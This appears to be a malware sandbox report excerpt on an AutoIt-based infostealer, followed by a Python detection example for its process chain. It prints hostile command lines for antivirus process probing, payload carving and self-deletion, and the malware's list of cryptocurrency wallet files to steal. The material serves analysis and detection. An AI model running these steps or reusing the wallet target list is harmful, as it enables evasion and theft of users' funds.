                        Source: Binary string: nss3.pdb@ source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: cryptosetup.pdbGCTL source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: cryptosetup.pdb source: Gift.pif, 0000000B.00000002.3221967002.000000000BEEF000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, GDAAKK.11.dr
                        Source: Binary string: softokn3.pdb@ source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Gift.pif, 0000000B.00000002.3238395117.000000002B17C000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Gift.pif, 0000000B.00000002.3232561588.000000001F29A000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                        Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifCode function: 11_2_002F8B75 push ecx; ret 11_2_002F8B88

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe :: File created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\CBKJJJDHDGDA\GDAAKK
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_003559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002E5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002F33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\lem.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\lem.exe :: Stalling execution: Execution stalls by calling Sleep (graph_0-3897)
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Dropped PE file which has not been started: C:\ProgramData\CBKJJJDHDGDA\GDAAKK
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_11-100353)
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: API coverage: 4.3 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 4024 :: Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1100 :: Thread sleep count: 49 > 30
Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed
Source: C:\Windows\SysWOW64\timeout.exe :: Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\lem.exe :: Code function: 0_2_004062D5 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\lem.exe :: Code function: 0_2_00402E18 FindFirstFileW
Source: C:\Users\user\Desktop\lem.exe :: Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00334005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033494A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033CD14 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0033FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00333CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002E5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: Gift.pif, 0000000B.00000002.3217284098.000000000161C000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: VMwareVMwareOe
Source: Gift.pif, 0000000B.00000002.3217284098.000000000161C000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: VMwareVMware
Source: Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000046D2000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217461443.000000000174F000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: Hyper-V RAW
Source: Gift.pif, 0000000B.00000002.3217806128.00000000046D2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: API call chain: ExitProcess graph end node (graph_11-98942)
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: API call chain: ExitProcess graph end node (graph_11-100085)
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_003445D5 BlockInput
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00305CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\lem.exe :: Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_003288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Windows\SysWOW64\tasklist.exe :: Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002FA354 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002FA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match :: File source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00329369 LogonUserW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002E5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00331AC6 SendInput,keybd_event
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_003351E2 mouse_event
Source: C:\Users\user\Desktop\lem.exe :: Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 366791
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TrailersTractOffersVenezuela" Mines
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif 366791\Gift.pif 366791\M
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_003288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00334F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: lem.exe, 00000000.00000003.2038093775.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp, Residents.0.dr, Gift.pif.2.dr :: Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Gift.pif :: Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_002F885B cpuid
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00310030 GetLocalTime,__swprintf
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_00310722 GetUserNameW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: Code function: 11_2_0030416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\lem.exe :: Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW
Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif :: WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
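The process chain listed above is the recognisable batch-dropper pattern: tasklist piped into findstr /I for security-product process names, findstr /V with a junk marker to carve the payload out of a padded file, a .pif (the renamed AutoIt interpreter) launched from the user's Temp folder, then cmd /c timeout and del /f /q so the interpreter erases itself. The Python below is an added detection example written for this page; it is not part of the Joe Sandbox report. The ProcEvent layout and the rule thresholds are our assumptions; the image paths and command lines in SAMPLE_EVENTS are transcribed from the "Process created" lines above.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # command line of the created process


# Transcribed from the "Process created" lines of the report above.
# The tuple layout is ours; the values are the report's.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\lem.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /I "wrsa.exe opssvc.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe", "cmd /c md 366791"),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\findstr.exe",
              'findstr /V "TrailersTractOffersVenezuela" Mines'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Users\user\AppData\Local\Temp\366791\Gift.pif", r"366791\Gift.pif 366791\M"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\366791\Gift.pif", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q '
              r'"C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit'),
]

# Security-product process names the script greps for (the two findstr lists above).
AV_PROCESS_NAMES = {"wrsa.exe", "opssvc.exe", "avastui.exe", "avgui.exe",
                    "bdservicehost.exe", "nswscsvc.exe", "sophoshealth.exe"}

FINDSTR_RE = re.compile(r'findstr\s+(/\S+)\s+"([^"]*)"', re.I)


def av_process_probe(ev: ProcEvent) -> bool:
    """findstr /I "<av names>" fed from tasklist: the script checks which AV is running."""
    m = FINDSTR_RE.match(ev.cmdline)
    if not m or m.group(1).upper() != "/I":
        return False
    return any(w.lower() in AV_PROCESS_NAMES for w in m.group(2).split())


def payload_carve(ev: ProcEvent) -> bool:
    """findstr /V "<junk marker>" <file>: prints every line NOT containing the marker,
    i.e. strips padding lines from an obfuscated file to reassemble the payload."""
    return re.search(r'findstr\s+/V\s+"[^"]+"\s+\S+', ev.cmdline, re.I) is not None


def pif_from_temp(ev: ProcEvent) -> bool:
    """A .pif started from the user's Temp folder (here the renamed AutoIt interpreter)."""
    img = ev.image.lower()
    return img.endswith(".pif") and "\\appdata\\local\\temp\\" in img


def self_delete_after_timeout(ev: ProcEvent) -> bool:
    """cmd /c timeout /t N & del /f /q "<parent image>": the parent erases itself."""
    c = ev.cmdline.lower()
    return "timeout /t" in c and "del /f /q" in c and ev.parent.lower() in c


RULES = [
    ("av_process_probe", av_process_probe),
    ("payload_carve", payload_carve),
    ("pif_from_temp", pif_from_temp),
    ("self_delete_after_timeout", self_delete_after_timeout),
]


def classify(events) -> dict:
    """Map each rule that fired to the indexes of the events that triggered it."""
    hits = {}
    for i, ev in enumerate(events):
        for tag, pred in RULES:
            if pred(ev):
                hits.setdefault(tag, []).append(i)
    return hits


def is_batch_dropper_chain(events, min_stages: int = 3) -> bool:
    """Verdict for a whole process tree: several distinct stages, not one noisy event."""
    return len(classify(events)) >= min_stages


if __name__ == "__main__":
    for tag, idx in classify(SAMPLE_EVENTS).items():
        print(f"{tag}: events {idx}")
    print("dropper chain:", is_batch_dropper_chain(SAMPLE_EVENTS))
```

Each rule on its own is weak (findstr /V is legitimate, and a lone timeout-and-del is common in installers); the verdict is taken on the tree, which is why is_batch_dropper_chain requires several distinct stages before it fires.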

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.16a2810.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.46e0000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.4688da0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.4688da0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Gift.pif.1722008.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.3.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
